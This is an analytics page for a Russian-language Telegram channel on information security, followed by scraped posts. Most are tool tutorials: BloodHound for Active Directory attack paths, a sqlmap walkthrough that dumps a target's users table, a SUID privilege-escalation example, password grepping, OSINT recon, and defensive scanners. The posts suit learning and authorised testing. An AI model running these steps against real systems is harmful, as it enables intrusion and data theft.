CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: PySec Edition
Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 023 subscribers, ranking 8 813 in the Technologies & Applications category and 46 152 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 023 subscribers.
According to the latest data from 22 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 714 over the last 30 days and by 34 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 10.51%. Within the first 24 hours after publication, content typically collects 5.53% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 472 views. Within the first day, a publication typically gains 775 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 7.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 23 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
— Кодинг: тут без сюрпризов, он лучший. — Контекст: запоминает детали намного лучше, чем ChatGPT и Gemini — Агентский режим: тестировал на разных задачах, дальше чуть конкретнееВозможности агента я решил протестировать на задаче, до которой давно не доходили руки — собрать чистое инфополе с нуля. Чтобы не перебирать паблики вручную, я зашел через функцию похожих каналов в Telegram. Скормил Claude ссылки на качественных авторов по IT и AI, которых читаю сам,и попросил проанализировать сотни выданных рекомендаций. Агент изучил контент на этих каналах и оставил только тех авторов, кто делится практическим опытом по: автоматизации, вайб-кодингу и нейрогенерации. Claude собрал полезную подборку экспертов, которую я упаковал в одну папку. Делюсь этим списком с вами — внутри только полезный контент про IT и AI. Подписка в один клик: 👉https://t.me/addlist/2Whrc1mRMUYzNmI6
sudo apt install htop && htop
2. nethogs — показывает трафик по PID и имени процесса
sudo nethogs
3. iotop — дисковый I/O по процессам
sudo iotop
4. nmon — всё в одном: CPU, память, диск, сеть
sudo apt install nmon && nmon
5. glances — питон-скрипт с веб-интерфейсом
pip install glances && glances
6. journalctl -f — живые логи systemd
journalctl -f -u ssh
7. ss -tunp — активные сетевые соединения
ss -tunp | grep ESTAB
8. df -h — свободное место на дисках
df -h9. du -sh / — размер папки
du -sh /var/log
10. systemctl status — статус сервиса
systemctl status nginx --no-pager
🔖 Сохраняйте.
😈 CodeGuard: PySec Edition | Чат🔵Находит самый короткий путь до Domain Admin 🔵Анализирует связи между пользователями, группами, компьютерами 🔵Помогает строить граф атакУстановка:
sudo apt install bloodhound
sudo neo4j start
bloodhound
Сбор данных (на Windows в домене):
SharpHound.exe -c All
Типовые запросы:
➡️ Самый короткий путь до DA ➡️ Пользователи с правами на несколько машин ➡️ Пользователи с паролями в описании😈 CodeGuard: PySec Edition | Чат
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog github --repo https://github.com/target/repo
Ссылка ⭐️ 17k
2. Gitleaks — быстрый сканер с интеграцией в CI/CD
gitleaks detect --source . --verbose
Ссылка ⭐️ 17k
3. GitGuardian (CLI) — ищет 200+ типов секретов
ggshield scan path /home/projectСсылка 💡 Совет: Запускайте на своих репозиториях перед публикацией. 😈 CodeGuard: PySec Edition | Чат
➡️ Свежие CVE и уязвимости ➡️ Новости взломов и утечек ➡️ Аналитика и обзоры ➡️ Подкасты и интервью с экспертамиПочему читать: Один из немногих русскоязычных ресурсов, который оперативно переводит западные разборы и добавляет свои кейсы. Бонусный раздел — «Блоги»: Практикующие пентестеры делятся техниками, скриптами и опытом. 😈 CodeGuard: PySec Edition | Чат
sudo apt install lynis
Запуск аудита:
sudo lynis audit system
Что проверяет:
⚫️Пароли и учётные записи ⚫️Права на файлы (/etc, /var, /tmp) ⚫️Сетевые настройки (SSH, firewall, открытые порты) ⚫️Логирование и доступ к логам ⚫️Наличие бэкдоров и rootkitПример вывода:
[+] SSH — рекомендовано использовать ключи вместо паролей [!] /tmp не смонтирован с nodevФикс проблем:
sudo lynis audit system --quick
sudo lynis audit system --fix
🔥 Бонус: Lynis даёт готовый совет по каждой найденной проблеме.
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/lanmaster53/recon-ng
cd recon-ng
pip install -r REQUIREMENTS
./recon-ng
Базовый кейс:
marketplace install all
workspace create target_company
modules load recon/domains-hosts/bing_domain_web
set source company.com
run
🔥 Кейс: Осинтер получил доступ к Jenkins, когда модуль recon/domains-hosts/hackertarget нашёл скрытый поддомен jenkins.company.com, а recon/contacts-contacts/mailtester подтвердил email техподдержки. Атака через забытый поддомен — самый частый путь.
💡 Совет: Запускайте через прокси.
😈 CodeGuard: PySec Edition | Чатdocker pull ghcr.io/prowlrbot/cybersandbox
😈 CodeGuard: PySec Edition | Чатfind / -name "config.php" 2>/dev/null
2. Искать в файлах (grep)
grep -r "password" /home/
3. Сетевая диагностика
netstat -tulpn
4. Просмотр живых логов
tail -f /var/log/syslog
5. Убить процесс по имени
pkill -f "python evil.py"
6. Права SUID (для повышения привилегий)
find / -perm -4000 2>/dev/null
7. История команд
history | grep nmap
8. Зашифровать файл
gpg -c secret.txt
9. Расшифровать файл
gpg secret.txt.gpg
10. Освободить RAM
echo 3 > /proc/sys/vm/drop_caches
Сохраняйте.
😈 CodeGuard: PySec Edition | Чат🔵Как AiTM-фишинг обходил MFA мейнтейнеров 🔵Почему proof of concept такого червя создали ещё 10 лет назад 🔵Как защитить свои проекты от supply chain-атакИдеально для разработчиков, DevOps и всех, кто работает с open-source. 😈 CodeGuard: PySec Edition | Чат
owasp.org/www-project-juice-shop
Как начать:
docker pull bkimminich/juice-shop
docker run -d -p 3000:3000 bkimminich/juice-shop
Открыть http://localhost:3000
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Шаг 2. Базовое сканирование
python sqlmap.py -u "https://target.com/page?id=1"
Шаг 3. Забираем базы данных
python sqlmap.py -u "https://target.com/page?id=1" --dbs
Шаг 4. Забираем таблицы
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд --tables
Шаг 5. Дамп таблиц
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд -T users --dump
Важно: Только на своих системах или с разрешения. За несанкционированный доступ — уголовная статья.
😈 CodeGuard: PySec Edition | Чатfind / -perm -4000 2>/dev/null
Проверка на уязвимые известные бинарники:
text
find / -perm -4000 2>/dev/null | grep -E "nmap|vim|find|bash|less|more"
Пример эксплуатации (на своих виртуалках):
/usr/bin/find /etc/passwd -exec whoami \;
Если результат root — вы повысили привилегии.
Что делать для защиты: Убирать SUID с ненужных файлов через chmod u-s /path/to/file
😈 CodeGuard: PySec Edition | Чат🔵Что под ударом: Zyxel NAS, DSL-роутеры, точки доступа. Список: NAS326, NAS542, NWA50AX, WAC500 и другие. 🔵Где искать: Проверьте сайт Zyxel, загрузите ваш IP в поисковик по модели. 🔵Что искать: Пользователи zyfwp, Printer, MFT. В логах SSH — подозрильные входы с незнакомых IP.Как защититься: Обновите прошивку до версии с патчем. Если нет обновления — отключите удалённый доступ к админке. 😈 CodeGuard: PySec Edition | Чат
